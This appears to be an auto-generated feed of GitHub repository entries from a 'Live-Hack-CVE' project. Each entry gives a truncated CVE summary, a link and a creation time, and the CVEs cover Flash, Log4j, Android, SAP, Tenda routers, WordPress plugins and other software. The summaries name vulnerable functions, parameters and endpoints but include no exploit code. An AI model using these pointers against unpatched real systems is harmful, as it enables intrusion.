**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0997](https://github.com/Live-Hack-CVE/CVE-2016-0997) create time: 2022-12-27T16:52:38Z

**Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17571](https://github.com/Live-Hack-CVE/CVE-2019-17571) create time: 2022-12-27T16:55:50Z

**IBM Cognos Analytics 11.0 and 11.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 159356. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4231](https://github.com/Live-Hack-CVE/CVE-2019-4231) create time: 2022-12-27T16:55:21Z

**Lout 3.40 has a heap-based buffer overflow in the srcnext() function in z02.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19918](https://github.com/Live-Hack-CVE/CVE-2019-19918) create time: 2022-12-27T16:54:55Z

**sa-exim 4.2.1 allows attackers to execute arbitrary code if they can write a .cf file or a rule. This occurs because Greylisting.pm relies on eval (rather than direct parsing and/or use of the taint feature). This issue is similar to CVE-2018-11805. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19920](https://github.com/Live-Hack-CVE/CVE-2019-19920) create time: 2022-12-27T16:54:45Z

**kernel/sched/fair.c in the Linux kernel before 5.3.9, when cpu.cfs_quota_us is used (e.g., with Kubernetes), allows attackers to cause a denial of service against non-cpu-bound applications by generating a workload that triggers unwanted slice expiration, aka CID-de53fd7aedb1. (In other words, although this slice expir CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19922](https://github.com/Live-Hack-CVE/CVE-2019-19922) create time: 2022-12-27T16:53:29Z

**In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 on Windows, PHP link() function accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11044](https://github.com/Live-Hack-CVE/CVE-2019-11044) create time: 2022-12-27T16:52:44Z

**An issue was discovered in the stack crate before 0.3.1 for Rust. ArrayVec has an out-of-bounds write via element insertion. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35895](https://github.com/Live-Hack-CVE/CVE-2020-35895) create time: 2022-12-27T16:54:52Z

**The Advanced Page Visit Counter WordPress plugin before 6.1.2 does not sanitise and escape some input before outputting it in an admin dashboard page, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admins viewing it CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25086](https://github.com/Live-Hack-CVE/CVE-2021-25086) create time: 2022-12-27T16:55:57Z

**Konga v0.14.9 is affected by an incorrect access control vulnerability where a specially crafted request can lead to privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42192](https://github.com/Live-Hack-CVE/CVE-2021-42192) create time: 2022-12-27T16:55:53Z

**A potential security vulnerability has been identified for certain HP multifunction printers (MFPs). The vulnerability may lead to Denial of Service when running HP Workpath solutions on potentially affected products. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3821](https://github.com/Live-Hack-CVE/CVE-2021-3821) create time: 2022-12-27T16:50:33Z

**In the user interface buttons of PermissionController, there is a possible way to bypass permissions dialogs due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39617](https://github.com/Live-Hack-CVE/CVE-2021-39617) create time: 2022-12-27T16:49:21Z

**In TBD of TBD, there is a possible way to archive arbitrary code execution in kernel due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-254742984 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39660](https://github.com/Live-Hack-CVE/CVE-2021-39660) create time: 2022-12-27T16:49:18Z

**In findAllDeAccounts of AccountsDb.java, there is a possible denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L And CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0934](https://github.com/Live-Hack-CVE/CVE-2021-0934) create time: 2022-12-27T16:47:10Z

**Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Reflected XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46906](https://github.com/Live-Hack-CVE/CVE-2022-46906) create time: 2022-12-27T16:46:59Z

**Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an unauthenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Reflected XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46905](https://github.com/Live-Hack-CVE/CVE-2022-46905) create time: 2022-12-27T16:46:56Z

**Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Self-XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46904](https://github.com/Live-Hack-CVE/CVE-2022-46904) create time: 2022-12-27T16:46:51Z

**Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Stored XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46903](https://github.com/Live-Hack-CVE/CVE-2022-46903) create time: 2022-12-27T16:46:47Z

**A use-after-free vulnerability was found in the Linux kernel in drivers/net/hamradio. This flaw allows a local attacker with a user privilege to cause a denial of service (DOS) when the mkiss or sixpack device is detached and reclaim resources early. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1195](https://github.com/Live-Hack-CVE/CVE-2022-1195) create time: 2022-12-27T16:56:10Z

**A vulnerability was found in the pfkey_register function in net/key/af_key.c in the Linux kernel. This flaw allows a local, unprivileged user to gain access to kernel memory, leading to a system crash or a leak of internal kernel information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1353](https://github.com/Live-Hack-CVE/CVE-2022-1353) create time: 2022-12-27T16:56:00Z

**Bluetooth® Low Energy Pairing in Bluetooth Core Specification v4.0 through v5.3 may permit an unauthenticated MITM to acquire credentials with two pairing devices via adjacent access when the MITM negotiates Legacy Passkey Pairing with the pairing Initiator and Secure Connections Passkey Pairing with the pairing Respon CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25836](https://github.com/Live-Hack-CVE/CVE-2022-25836) create time: 2022-12-27T16:55:41Z

**Bluetooth® Pairing in Bluetooth Core Specification v1.0B through v5.3 may permit an unauthenticated MITM to acquire credentials with two pairing devices via adjacent access when at least one device supports BR/EDR Secure Connections pairing and the other BR/EDR Legacy PIN code pairing if the MITM negotiates BR/EDR Secu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25837](https://github.com/Live-Hack-CVE/CVE-2022-25837) create time: 2022-12-27T16:55:17Z

**In SAP Host Agent (SAPOSCOL) - version 7.22, an attacker may use files created by saposcol to escalate privileges for themselves. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35295](https://github.com/Live-Hack-CVE/CVE-2022-35295) create time: 2022-12-27T16:55:10Z

**Insufficient Verification of Data Authenticity vulnerability in Hewlett Packard Enterprise HPE Nimble Storage Hybrid Flash Arrays and Nimble Storage Secondary Flash Arrays. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37928](https://github.com/Live-Hack-CVE/CVE-2022-37928) create time: 2022-12-27T16:55:07Z

**** DISPUTED ** In the python-libnmap package through 0.7.2 for Python, remote command execution can occur (if used in a client application that does not validate arguments). NOTE: the vendor believes it would be unrealistic for an application to call NmapProcess with arguments taken from input data that arrived over an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30284](https://github.com/Live-Hack-CVE/CVE-2022-30284) create time: 2022-12-27T16:54:42Z

**Affected builds of Trend Micro Apex One and Apex One as a Service contain a monitor engine component that is complied without the /SAFESEH memory protection mechanism which helps to monitor for malicious payloads. The affected component's memory protection mechanism has been updated to enhance product security. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44654](https://github.com/Live-Hack-CVE/CVE-2022-44654) create time: 2022-12-27T16:53:53Z

**A security agent directory traversal vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44653](https://github.com/Live-Hack-CVE/CVE-2022-44653) create time: 2022-12-27T16:53:50Z

**An improper handling of exceptional conditions vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44652](https://github.com/Live-Hack-CVE/CVE-2022-44652) create time: 2022-12-27T16:53:47Z

**A Time-of-Check Time-Of-Use vulnerability in the Trend Micro Apex One and Apex One as a Service agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44651](https://github.com/Live-Hack-CVE/CVE-2022-44651) create time: 2022-12-27T16:53:43Z

**Alist v3.5.1 is vulnerable to Cross Site Scripting (XSS) via the bulletin board. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45970](https://github.com/Live-Hack-CVE/CVE-2022-45970) create time: 2022-12-27T16:53:40Z

**Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45968](https://github.com/Live-Hack-CVE/CVE-2022-45968) create time: 2022-12-27T16:53:37Z

**Python 3.9.x and 3.10.x through 3.10.8 on Linux allows local privilege escalation in a non-default configuration. The Python multiprocessing library, when used with the forkserver start method on Linux, allows pickles to be deserialized from any user in the same machine local network namespace, which in many system con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42919](https://github.com/Live-Hack-CVE/CVE-2022-42919) create time: 2022-12-27T16:53:26Z

**IBM CICS TX 11.1 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 229461. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34318](https://github.com/Live-Hack-CVE/CVE-2022-34318) create time: 2022-12-27T16:53:23Z

**The Samsung TV (2021 and 2022 model) smart remote control allows attackers to enable microphone access via Bluetooth spoofing when a user is activating remote control by pressing a button. This is fixed in xxx72510, E9172511 for 2021 models, xxxA1000, 4x2A0200 for 2022 models. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44636](https://github.com/Live-Hack-CVE/CVE-2022-44636) create time: 2022-12-27T16:53:19Z

**IBM Db2U 3.5, 4.0, and 4.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 237210. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41296](https://github.com/Live-Hack-CVE/CVE-2022-41296) create time: 2022-12-27T16:53:16Z

**Tenda W20E V16.01.0.6(3392) is vulnerable to Command injection via cmd_get_ping_output. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45996](https://github.com/Live-Hack-CVE/CVE-2022-45996) create time: 2022-12-27T16:52:34Z

**Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via /goform/SysToolRestoreSet . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45980](https://github.com/Live-Hack-CVE/CVE-2022-45980) create time: 2022-12-27T16:52:31Z

**Tenda AX12 v22.03.01.21_CN was discovered to contain a stack overflow via the ssid parameter at /goform/fast_setting_wifi_set . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45979](https://github.com/Live-Hack-CVE/CVE-2022-45979) create time: 2022-12-27T16:52:09Z

**Tenda AX12 V22.03.01.21_CN was found to have a command injection vulnerability via /goform/setMacFilterCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45977](https://github.com/Live-Hack-CVE/CVE-2022-45977) create time: 2022-12-27T16:52:06Z

**Elevation of privilege in the Azure SQL Data Source in Devolutions Remote Desktop Manager 2022.3.13 to 2022.3.24 allows an authenticated user to spoof a privileged account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3641](https://github.com/Live-Hack-CVE/CVE-2022-3641) create time: 2022-12-27T16:52:03Z

**Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45997](https://github.com/Live-Hack-CVE/CVE-2022-45997) create time: 2022-12-27T16:51:59Z

**A cross-site request forgery (CSRF) vulnerability in Jenkins Sonar Gerrit Plugin 377.v8f3808963dc5 and earlier allows attackers to have Jenkins connect to Gerrit servers (previously configured by Jenkins administrators) using attacker-specified credentials IDs obtained through another method, potentially capturing cred CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46688](https://github.com/Live-Hack-CVE/CVE-2022-46688) create time: 2022-12-27T16:51:56Z

**In IFM Moneo Appliance with version up to 1.9.3 an unauthenticated remote attacker can reset the administrator password by only supplying the serial number. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3485](https://github.com/Live-Hack-CVE/CVE-2022-3485) create time: 2022-12-27T16:51:52Z

**The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection WordPress plugin before 7.24 does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3883](https://github.com/Live-Hack-CVE/CVE-2022-3883) create time: 2022-12-27T16:51:49Z

**The Easy Form Builder WordPress plugin before 3.4.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3906](https://github.com/Live-Hack-CVE/CVE-2022-3906) create time: 2022-12-27T16:51:45Z

**The Cooked Pro WordPress plugin before 1.7.5.7 does not properly validate or sanitize the recipe_args parameter before unserializing it in the cooked_loadmore action, allowing an unauthenticated attacker to trigger a PHP Object injection vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3900](https://github.com/Live-Hack-CVE/CVE-2022-3900) create time: 2022-12-27T16:51:42Z

**The Helloprint WordPress plugin before 1.4.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3908](https://github.com/Live-Hack-CVE/CVE-2022-3908) create time: 2022-12-27T16:51:39Z

**The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan WordPress plugin before 4.20 does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3880](https://github.com/Live-Hack-CVE/CVE-2022-3880) create time: 2022-12-27T16:51:35Z

**libde265 v1.0.4 contains a heap buffer overflow in the de265_image::available_zscan function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21599](https://github.com/Live-Hack-CVE/CVE-2020-21599) create time: 2022-12-27T16:05:31Z

**Logrhythm Web Console 7.4.9 allows for HTML tag injection through Contextualize Action -> Create a new Contextualize Action -> Inject your HTML tag in the name field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41943](https://github.com/Live-Hack-CVE/CVE-2021-41943) create time: 2022-12-27T16:10:03Z

**EXEMSI MSI Wrapper Versions prior to 10.0.50 and at least since version 6.0.91 will introduce a local privilege escalation vulnerability in installers it creates. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32415](https://github.com/Live-Hack-CVE/CVE-2021-32415) create time: 2022-12-27T16:09:41Z

**Acronis True Image 2019 update 1 through 2021 update 1 on macOS allows local privilege escalation due to an insecure XPC service configuration. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25736](https://github.com/Live-Hack-CVE/CVE-2020-25736) create time: 2022-12-27T16:09:37Z

**A null pointer de-reference was found in the way samba kerberos server handled missing sname in TGS-REQ (Ticket Granting Server - Request). An authenticated user could use this flaw to crash the samba server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3671](https://github.com/Live-Hack-CVE/CVE-2021-3671) create time: 2022-12-27T16:09:34Z

**A vulnerability was found in claviska jquery-minicolors up to 2.3.5. It has been rated as problematic. Affected by this issue is some unknown functionality of the file jquery.minicolors.js. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.3.6 is able to address CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4243](https://github.com/Live-Hack-CVE/CVE-2021-4243) create time: 2022-12-27T16:08:11Z

**A vulnerability classified as problematic has been found in yikes-inc-easy-mailchimp-extender Plugin up to 6.8.5. This affects an unknown part of the file admin/partials/ajax/add_field_to_form.php. The manipulation of the argument field_name/merge_tag/field_type/list_id leads to cross site scripting. It is possible to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4244](https://github.com/Live-Hack-CVE/CVE-2021-4244) create time: 2022-12-27T16:07:58Z

**Windows NAT Denial of Service Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40463](https://github.com/Live-Hack-CVE/CVE-2021-40463) create time: 2022-12-27T16:07:14Z

**Windows Media Foundation Dolby Digital Atmos Decoders Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40462](https://github.com/Live-Hack-CVE/CVE-2021-40462) create time: 2022-12-27T16:07:11Z

**Windows Text Shaping Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40465](https://github.com/Live-Hack-CVE/CVE-2021-40465) create time: 2022-12-27T16:07:03Z

**In PHP versions 7.3.x below 7.3.33, 7.4.x below 7.4.26 and 8.0.x below 8.0.13, certain XML parsing functions, like simplexml_load_file(), URL-decode the filename passed to them. If that filename contains URL-encoded NUL character, this may cause the function to interpret this as the end of the filename, thus interpreti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21707](https://github.com/Live-Hack-CVE/CVE-2021-21707) create time: 2022-12-27T16:05:27Z

**An Incorrect Access Control vulnerability exists in libde265 v1.0.8 due to a SEGV in slice.cc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35452](https://github.com/Live-Hack-CVE/CVE-2021-35452) create time: 2022-12-27T16:05:23Z

**An issue has been found in libde265 v1.0.8 due to incorrect access control. A SEGV caused by a READ memory access in function derive_boundaryStrength of deblock.cc has occurred. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36411](https://github.com/Live-Hack-CVE/CVE-2021-36411) create time: 2022-12-27T16:05:20Z

**A stack-buffer-overflow exists in libde265 v1.0.8 via fallback-motion.cc in function put_epel_hv_fallback when running program dec265. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36410](https://github.com/Live-Hack-CVE/CVE-2021-36410) create time: 2022-12-27T16:05:16Z

**There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file, which allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file or possibly have unspecified other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36409](https://github.com/Live-Hack-CVE/CVE-2021-36409) create time: 2022-12-27T16:05:12Z

**An issue was discovered in libde265 v1.0.8.There is a Heap-use-after-free in intrapred.h when decoding file using dec265. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36408](https://github.com/Live-Hack-CVE/CVE-2021-36408) create time: 2022-12-27T16:05:09Z

**A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V3.0.1), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions < V4.6.0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44695](https://github.com/Live-Hack-CVE/CVE-2021-44695) create time: 2022-12-27T15:27:25Z

**A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V3.0.1), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions < V4.6.0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44694](https://github.com/Live-Hack-CVE/CVE-2021-44694) create time: 2022-12-27T15:26:01Z

**An unauthenticated attacker over the network can attach to an open interface exposed through JNDI by the User Defined Search (UDS) of SAP NetWeaver Process Integration (PI) - version 7.50 and make use of an open naming and directory API to access services which can be used to perform unauthorized operations affecting u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41272](https://github.com/Live-Hack-CVE/CVE-2022-41272) create time: 2022-12-27T16:14:58Z

**Due to improper input sanitization in SAP Sourcing and SAP Contract Lifecycle Management - version 1100, an attacker can redirect a user to a malicious website. In order to perform this attack, the attacker sends an email to the victim with a manipulated link that appears to be a legitimate SAP Sourcing URL, since the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41273](https://github.com/Live-Hack-CVE/CVE-2022-41273) create time: 2022-12-27T16:14:55Z

**In SAP Solution Manager (Enterprise Search) - versions 740, and 750, an unauthenticated attacker can generate a link that, if clicked by a logged-in user, can be redirected to a malicious page that could read or modify sensitive information, or expose the user to a phishing attack, with little impact on confidentiality CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41275](https://github.com/Live-Hack-CVE/CVE-2022-41275) create time: 2022-12-27T16:14:52Z

**In NotificationChannel of NotificationChannel.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20487](https://github.com/Live-Hack-CVE/CVE-2022-20487) create time: 2022-12-27T16:14:48Z

**In NotificationChannel of NotificationChannel.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20491](https://github.com/Live-Hack-CVE/CVE-2022-20491) create time: 2022-12-27T16:14:44Z

**In some SAP standard roles in SAP Business Planning and Consolidation - versions - SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, DWCORE 200, 300, CPMBPC 810, a transaction code reserved for the customer is used. By implementing such transaction code, a malicious user may execute unauthorized transaction functionality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41268](https://github.com/Live-Hack-CVE/CVE-2022-41268) create time: 2022-12-27T16:14:41Z

**SAP Business Objects Platform - versions 420, and 430, allows an attacker with normal BI user privileges to upload/replace any file on Business Objects server at the operating system level, enabling the attacker to take full control of the system causing a high impact on confidentiality, integrity, and availability of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41267](https://github.com/Live-Hack-CVE/CVE-2022-41267) create time: 2022-12-27T16:14:38Z

**Due to a lack of proper input validation, SAP Commerce Webservices 2.0 (Swagger UI) - versions 1905, 2005, 2105, 2011, 2205, allows malicious inputs from untrusted sources, which can be leveraged by an attacker to execute a DOM Cross-Site Scripting (XSS) attack. As a result, an attacker may be able to steal user tokens CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41266](https://github.com/Live-Hack-CVE/CVE-2022-41266) create time: 2022-12-27T16:14:10Z

**A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37932](https://github.com/Live-Hack-CVE/CVE-2022-37932) create time: 2022-12-27T16:14:06Z

**HP Support Assistant uses HP Performance Tune-up as a diagnostic tool. HP Support Assistant uses Fusion to launch HP Performance Tune-up. It is possible for an attacker to exploit the DLL hijacking vulnerability and elevate privileges when Fusion launches the HP Performance Tune-up. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38395](https://github.com/Live-Hack-CVE/CVE-2022-38395) create time: 2022-12-27T16:14:03Z

**Due to the unrestricted scope of the RFC function module, SAP BASIS - versions 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, 791, allows an authenticated non-administrator attacker to access a system class and execute any of its public methods with parameters provided by the attacker. On successful exploi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41264](https://github.com/Live-Hack-CVE/CVE-2022-41264) create time: 2022-12-27T16:13:59Z

**Due to a missing authentication check, SAP Business Objects Business Intelligence Platform (Web Intelligence) - versions 420, 430, allows an authenticated non-administrator attacker to modify the data source information for a document that is otherwise restricted. On successful exploitation, the attacker can modify inf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41263](https://github.com/Live-Hack-CVE/CVE-2022-41263) create time: 2022-12-27T16:13:55Z

**SAP Solution Manager (Diagnostic Agent) - version 7.20, allows an authenticated attacker on Windows system to access a file containing sensitive data which can be used to access a configuration file which contains credentials to access other system files. Successful exploitation can make the attacker access files and s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41261](https://github.com/Live-Hack-CVE/CVE-2022-41261) create time: 2022-12-27T16:13:52Z

**An authenticated path traversal vulnerability exists in the Aruba EdgeConnect Enterprise web interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files on the underlying operating system, including sensitive system files in Aruba EdgeConnect Enterprise Software version(s): E CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43518](https://github.com/Live-Hack-CVE/CVE-2022-43518) create time: 2022-12-27T16:13:48Z

**A vulnerability was found in ipti br.tag. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.13.0 is able to address this issue. The name of the patch is 7e311be22d3a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4444](https://github.com/Live-Hack-CVE/CVE-2022-4444) create time: 2022-12-27T16:13:45Z

**A cleartext storage of sensitive information vulnerability exists in PcVue versions 8.10 through 15.2.3. This could allow an unauthorized user with access the email and short messaging service (SMS) accounts configuration files to discover the associated simple mail transfer protocol (SMTP) account credentials and the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4312](https://github.com/Live-Hack-CVE/CVE-2022-4312) create time: 2022-12-27T16:13:41Z

**Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aru CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43541](https://github.com/Live-Hack-CVE/CVE-2022-43541) create time: 2022-12-27T16:13:38Z

**An insertion of sensitive information into log file vulnerability exists in PcVue versions 15 through 15.2.2. This could allow a user with access to the log files to discover connection strings of data sources configured for the DbConnect, which could include credentials. Successful exploitation of this vulnerability c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4311](https://github.com/Live-Hack-CVE/CVE-2022-4311) create time: 2022-12-27T16:13:34Z

**Denial of service in Modem due to reachable assertion while processing the common config procedure in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25692](https://github.com/Live-Hack-CVE/CVE-2022-25692) create time: 2022-12-27T16:13:31Z

**Memory corruption in MODEM due to Improper Validation of Array Index while processing GSTK Proactive commands in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25695](https://github.com/Live-Hack-CVE/CVE-2022-25695) create time: 2022-12-27T16:13:28Z

